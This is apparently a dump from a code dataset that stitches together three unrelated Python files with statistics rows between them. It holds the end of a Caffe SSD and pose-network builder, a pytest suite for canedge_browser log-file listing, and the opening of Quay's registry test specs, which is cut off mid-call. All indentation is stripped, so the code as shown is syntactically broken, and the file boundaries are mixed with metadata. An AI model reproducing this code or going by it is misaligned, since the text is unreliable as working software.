'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
if train:
net.vec_mask, net.heat_mask, net.vec_temp, net.heat_temp = \
L.Slice(net["label"+pose_string], ntop=4, slice_param=dict(slice_point=[34, 52, 86], axis=1))
else:
net.vec_mask, net.heat_mask, net.vec_temp, net.heat_temp, net.gt = \
L.Slice(net["label"+pose_string], ntop=5, slice_param=dict(slice_point=[34, 52, 86, 104], axis=1))
# label
net.vec_label = L.Eltwise(net.vec_mask, net.vec_temp, eltwise_param=dict(operation=P.Eltwise.PROD))
net.heat_label = L.Eltwise(net.heat_mask, net.heat_temp, eltwise_param=dict(operation=P.Eltwise.PROD))
###pose
pose_test_kwargs={
# nms
'nms_threshold': 0.05,
'nms_max_peaks': 500,
'nms_num_parts': 18,
# connect
'conn_is_type_coco': True,
'conn_max_person': 10,
'conn_max_peaks_use': 20,
'conn_iters_pa_cal': 10,
'conn_connect_inter_threshold': 0.05,
'conn_connect_inter_min_nums': 8,
'conn_connect_min_subset_cnt': 3,
'conn_connect_min_subset_score': 0.4,
# visual
'eval_area_thre': 64*64,
'eval_oks_thre': [0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9],
}
bn_kwargs = {
'param': [dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0)],
'eps': 0.001,
}
sb_kwargs = {
'bias_term': True,
'param': [dict(lr_mult=1, decay_mult=0), dict(lr_mult=1, decay_mult=0)],
'filler': dict(type='constant', value=1.0),
'bias_filler': dict(type='constant', value=0.2),
}
deconv_param = {
'num_output': 128,
'kernel_size': 2,
'pad': 0,
'stride': 2,
'weight_filler': dict(type='gaussian', std=0.01),
'bias_filler': dict(type='constant', value=0),
'group': 1,
}
kwargs_deconv = {
'param': [dict(lr_mult=1, decay_mult=1)],
'convolution_param': deconv_param
}
from_layer = "conv5_5" + pose_string
add_layer = from_layer + "_deconv"
net[add_layer] = L.Deconvolution(net[from_layer], **kwargs_deconv)
bn_name = add_layer + '_bn'
net[bn_name] = L.BatchNorm(net[add_layer], in_place=True, **bn_kwargs)
sb_name = add_layer + '_scale'
net[sb_name] = L.Scale(net[add_layer], in_place=True, **sb_kwargs)
relu_name = add_layer + '_relu'
net[relu_name] = L.ReLU(net[add_layer], in_place=True)
baselayer = add_layer
use_stage = 3
use_3_layers = 5
use_1_layers = 0
n_channel = 64
lrdecay = 1.0
kernel_size = 3
flag_output_sigmoid = False
for stage in xrange(use_stage):
if stage == 0:
from_layer = baselayer
else:
from_layer = "concat_stage{}".format(stage)
outlayer = "concat_stage{}".format(stage + 1)
if stage == use_stage - 1:
short_cut = False
else:
short_cut = True
net = mPose_StageX_Train(net, from_layer=from_layer, out_layer=outlayer, stage=stage + 1,
mask_vec="vec_mask", mask_heat="heat_mask", \
label_vec="vec_label", label_heat="heat_label", \
use_3_layers=use_3_layers, use_1_layers=use_1_layers, short_cut=short_cut, \
base_layer=baselayer, lr=0.1, decay=lrdecay, num_channels=n_channel,
kernel_size=kernel_size, flag_sigmoid=flag_output_sigmoid)
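    # Stage wiring: stage 1 reads the deconv base layer, each later stage reads
    # the concat_stage{N} blob emitted by its predecessor, and only the final
    # stage drops the shortcut concat (short_cut=False above).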
# for Test
if not train:
if flag_output_sigmoid:
conv_vec = "stage{}_conv{}_vec".format(use_stage, use_3_layers + use_1_layers) + "_sig"
conv_heat = "stage{}_conv{}_heat".format(use_stage, use_3_layers + use_1_layers) + "_sig"
else:
conv_vec = "stage{}_conv{}_vec".format(use_stage, use_3_layers + use_1_layers)
conv_heat = "stage{}_conv{}_heat".format(use_stage, use_3_layers + use_1_layers)
net.vec_out = L.Eltwise(net.vec_mask, net[conv_vec], eltwise_param=dict(operation=P.Eltwise.PROD))
net.heat_out = L.Eltwise(net.heat_mask, net[conv_heat], eltwise_param=dict(operation=P.Eltwise.PROD))
feaLayers = []
feaLayers.append(net.heat_out)
feaLayers.append(net.vec_out)
outlayer = "concat_stage{}".format(3)
net[outlayer] = L.Concat(*feaLayers, axis=1)
# Resize
resize_kwargs = {
'factor': pose_test_kwargs.get("resize_factor", 8),
'scale_gap': pose_test_kwargs.get("resize_scale_gap", 0.3),
'start_scale': pose_test_kwargs.get("resize_start_scale", 1.0),
}
net.resized_map = L.ImResize(net[outlayer], name="resize", imresize_param=resize_kwargs)
# Nms
nms_kwargs = {
'threshold': pose_test_kwargs.get("nms_threshold", 0.05),
'max_peaks': pose_test_kwargs.get("nms_max_peaks", 100),
'num_parts': pose_test_kwargs.get("nms_num_parts", 18),
}
net.joints = L.Nms(net.resized_map, name="nms", nms_param=nms_kwargs)
# ConnectLimbs
connect_kwargs = {
'is_type_coco': pose_test_kwargs.get("conn_is_type_coco", True),
'max_person': pose_test_kwargs.get("conn_max_person", 10),
'max_peaks_use': pose_test_kwargs.get("conn_max_peaks_use", 20),
'iters_pa_cal': pose_test_kwargs.get("conn_iters_pa_cal", 10),
'connect_inter_threshold': pose_test_kwargs.get("conn_connect_inter_threshold", 0.05),
'connect_inter_min_nums': pose_test_kwargs.get("conn_connect_inter_min_nums", 8),
'connect_min_subset_cnt': pose_test_kwargs.get("conn_connect_min_subset_cnt", 3),
'connect_min_subset_score': pose_test_kwargs.get("conn_connect_min_subset_score", 0.4),
}
net.limbs = L.Connectlimb(net.resized_map, net.joints, connect_limb_param=connect_kwargs)
# Eval
eval_kwargs = {
'stride': 8,
'area_thre': pose_test_kwargs.get("eval_area_thre", 64 * 64),
'oks_thre': pose_test_kwargs.get("eval_oks_thre", [0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]),
}
net.eval = L.PoseEval(net.limbs, net.gt, pose_eval_param=eval_kwargs)
return net
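# Minimal driver sketch (hypothetical, not from the original repo). The data
# and label layers, including their pose_string twins, must already be present
# in the NetSpec before either builder runs, e.g. via the DAPData helpers:
#
#   spec = caffe.NetSpec()
#   ... add "data"/"label" and "data_pose"/"label_pose" layers ...
#   spec = DAPNet(spec, train=True, data_layer="data", gt_label="label",
#                 net_width=512, net_height=288)
#   open('DAPNet_train.prototxt', 'w').write(str(spec.to_proto()))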
| 57.870249 | 178 | 0.62104 | 5,843 | 44,155 | 4.277597 | 0.057162 | 0.076818 | 0.04321 | 0.057614 | 0.883252 | 0.869969 | 0.858326 | 0.844643 | 0.83336 | 0.823198 | 0 | 0.032391 | 0.251863 | 44,155 | 763 | 179 | 57.870249 | 0.724224 | 0.013339 | 0 | 0.751043 | 0 | 0 | 0.233096 | 0.087713 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026426 | null | null | 0.002782 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8
624119ae0cf70022bfe2ed0e3a69eca111c16835 | 17,706 | py | Python | tests/test_list_folders.py | fourniernicolas/canedge_browser | c35b0445692257ee574976624b8d1a615b4d6eac | ["MIT"] | null | null | null | tests/test_list_folders.py | fourniernicolas/canedge_browser | c35b0445692257ee574976624b8d1a615b4d6eac | ["MIT"] | null | null | null | tests/test_list_folders.py | fourniernicolas/canedge_browser | c35b0445692257ee574976624b8d1a615b4d6eac | ["MIT"] | null | null | null |
import canedge_browser
import pytest
from datetime import datetime, timezone
from fsspec import AbstractFileSystem
from pathlib import Path
class TestListLogFiles(object):
@pytest.fixture()
def fs(self) -> AbstractFileSystem:
# Use the files already present in the examples section for testing.
test_data_path = Path(__file__).parent.parent / "examples" / "LOG"
fs = canedge_browser.LocalFileSystem(base_path=test_data_path)
return fs
def test_get_log_files_with_no_filesystem(self):
"""Sending invalid input should raise an exception.
"""
fs = None
devices = "AABBCCDD"
with pytest.raises(ValueError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_invalid_filesystem(self):
"""Sending invalid input should raise an exception.
"""
class InvalidFileSystem(object):
pass
fs = InvalidFileSystem()
devices = "AABBCCDD"
with pytest.raises(TypeError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_no_devices(self, fs):
"""Sending invalid input should raise an exception.
"""
devices = None
with pytest.raises(TypeError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_invalid_device(self, fs):
"""With a invalid/non-existing device name, ensure that no exceptions are thrown but merely an empty set of
results is received.
"""
devices = "abcdefghijkl"
result = canedge_browser.get_log_files(fs, devices)
assert len(result) == 0
return
def test_get_log_files_single_device_as_str(self, fs):
"""With a single valid device passed as a string, ensure that the expected log files are returned.
"""
devices = "EEEE0001"
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_single_device_as_list(self, fs):
"""With a single valid device passed as a list, ensure that the expected log files are returned.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_custom_extension(self, fs):
"""Attempt to use a non-default extension. Test for both upper- and lower-case variants.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/ignore.me",
}
result_a = canedge_browser.get_log_files(fs, devices, file_extensions=["me"])
result_b = canedge_browser.get_log_files(fs, devices, file_extensions=["ME"])
assert expected_files == set(result_a)
assert expected_files == set(result_b)
return
def test_get_log_files_with_multiple_extensions(self, fs):
"""Attempt to use a set of extensions.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
"/EEEE0001/00000001/ignore.me",
}
result = canedge_browser.get_log_files(fs, devices, file_extensions=["me", "MF4"])
assert set(result) == expected_files
return
def test_get_log_files_with_multiple_devices(self, fs):
"""Use a device list with multiple devices.
"""
devices = [
"EEEE0001",
"EEEE0002",
]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
'/EEEE0002/00000001/00000001.MF4',
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_multiple_devices_and_non_existing_devices(self, fs):
"""Use a device list with multiple devices, some of which are not present. Should only show the files for the
devices present.
"""
devices = [
"EEEE0011",
"EEEE0001",
"EEEE0002",
"EEEE0012",
]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
'/EEEE0002/00000001/00000001.MF4',
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date(self, fs):
"""Test all files are returned when the start date is outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=1, day=5, hour=10, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the start date is inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2021, month=5, day=12, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the start date is inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_c(self, fs):
"""Test a single file is returned when the start date is outside the end of the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2021, month=6, day=5, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date(self, fs):
"""Test all files are returned when the stop date is outside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2022, month=1, day=5, hour=10, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the stop date is inside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=6, day=6, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4"
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the stop date is inside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_c(self, fs):
"""Test no files are returned when the start date is outside the end of the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=6, day=3, hour=0, tzinfo=timezone.utc)
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert len(result) == 0
return
def test_get_log_files_with_start_and_stop_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2020, month=6, day=6, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2020, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_c(self, fs):
"""Test only a single file (the last file) is returned when the start and stop dates are outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2022, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2023, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_d(self, fs):
"""Test only a subset of files are returned when the start and stop dates are outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2018, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2019, month=8, day=29, hour=7, tzinfo=timezone.utc)
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert len(result) == 0
return
def test_get_log_files_with_start_and_stop_date_limiting_e(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range, but only one
session folder.
"""
devices = ["EEEE0004"]
start_date = datetime(year=2018, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2022, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0004/00000001/00000001.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
pass
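
# Illustrative usage sketch (not part of the test suite above): a minimal,
# hedged example of calling get_log_files directly. The local fsspec
# filesystem and the concrete device/dates are assumptions for illustration;
# any fsspec-compatible filesystem laid out as /<DEVICE>/<SESSION>/<FILE>.MF4
# should behave the same way.
def _example_get_log_files():
    import fsspec

    fs = fsspec.filesystem("file")
    return canedge_browser.get_log_files(
        fs,
        devices=["EEEE0001"],
        start_date=datetime(year=2020, month=6, day=5, tzinfo=timezone.utc),
        stop_date=datetime(year=2020, month=6, day=6, hour=7, tzinfo=timezone.utc),
    )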
| 37.197479
| 117
| 0.607365
| 1,985
| 17,706
| 5.238791
| 0.084131
| 0.126935
| 0.155303
| 0.046158
| 0.910664
| 0.895855
| 0.884989
| 0.875757
| 0.863256
| 0.8446
| 0
| 0.246516
| 0.282673
| 17,706
| 475
| 118
| 37.275789
| 0.572238
| 0.120468
| 0
| 0.762048
| 0
| 0
| 0.294385
| 0.279325
| 0
| 0
| 0
| 0
| 0.063253
| 1
| 0.072289
| false
| 0.006024
| 0.01506
| 0
| 0.165663
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
626322d69cda11071f3569293b3209bb2f3a9d5b
| 25,103
|
py
|
Python
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 2,027
|
2019-11-12T18:05:48.000Z
|
2022-03-31T22:25:04.000Z
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 496
|
2019-11-12T18:13:37.000Z
|
2022-03-31T10:43:45.000Z
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 249
|
2019-11-12T18:02:27.000Z
|
2022-03-22T12:19:19.000Z
|
import json
import hashlib
from flask import url_for
from base64 import b64encode
NO_REPO = None
PUBLIC = "public"
PUBLIC_REPO_NAME = "publicrepo"
PUBLIC_REPO = PUBLIC + "/" + PUBLIC_REPO_NAME
PRIVATE = "devtable"
PRIVATE_REPO_NAME = "shared"
PRIVATE_REPO = PRIVATE + "/" + PRIVATE_REPO_NAME
ORG = "buynlarge"
ORG_REPO = ORG + "/orgrepo"
ANOTHER_ORG_REPO = ORG + "/anotherorgrepo"
NEW_ORG_REPO = ORG + "/neworgrepo"
ORG_REPO_NAME = "orgrepo"
ORG_READERS = "readers"
ORG_OWNER = "devtable"
ORG_OWNERS = "owners"
FAKE_MANIFEST = "unknown_tag"
FAKE_DIGEST = "sha256:" + hashlib.sha256(b"fake").hexdigest()
FAKE_IMAGE_ID = "fake-image"
FAKE_UPLOAD_ID = "fake-upload"
FAKE_TAG_NAME = "fake-tag"
FAKE_USERNAME = "fakeuser"
FAKE_TOKEN = "fake-token"
FAKE_WEBHOOK = "fake-webhook"
BUILD_UUID = "123"
TRIGGER_UUID = "123"
NEW_ORG_REPO_DETAILS = {
"repository": "fake-repository",
"visibility": "private",
"description": "",
"namespace": ORG,
}
NEW_USER_DETAILS = {
"username": "bobby",
"password": "password",
"email": "bobby@tables.com",
}
SEND_RECOVERY_DETAILS = {
"email": "jacob.moshenko@gmail.com",
}
SIGNIN_DETAILS = {
"username": "devtable",
"password": "password",
}
FILE_DROP_DETAILS = {
"mimeType": "application/zip",
}
CHANGE_PERMISSION_DETAILS = {
"role": "admin",
}
CREATE_BUILD_DETAILS = {
"file_id": "fake-file-id",
}
CHANGE_VISIBILITY_DETAILS = {
"visibility": "public",
}
CREATE_TOKEN_DETAILS = {
"friendlyName": "A new token",
}
UPDATE_REPO_DETAILS = {
"description": "A new description",
}
class IndexV1TestSpec(object):
def __init__(
self,
url,
sess_repo=None,
anon_code=403,
no_access_code=403,
read_code=200,
creator_code=200,
admin_code=200,
):
self._url = url
self._method = "GET"
self._data = None
self.sess_repo = sess_repo
self.anon_code = anon_code
self.no_access_code = no_access_code
self.read_code = read_code
self.creator_code = creator_code
self.admin_code = admin_code
def gen_basic_auth(self, username, password):
encoded = b64encode(b"%s:%s" % (username.encode("ascii"), password.encode("ascii")))
return "basic %s" % encoded.decode("ascii")
def set_data_from_obj(self, json_serializable):
self._data = json.dumps(json_serializable)
return self
def set_method(self, method):
self._method = method
return self
def get_client_args(self):
kwargs = {"method": self._method}
if self._data or self._method == "POST" or self._method == "PUT" or self._method == "PATCH":
kwargs["data"] = self._data if self._data else "{}"
kwargs["content_type"] = "application/json"
return self._url, kwargs
def build_v1_index_specs():
return [
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 404, 403, 404
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
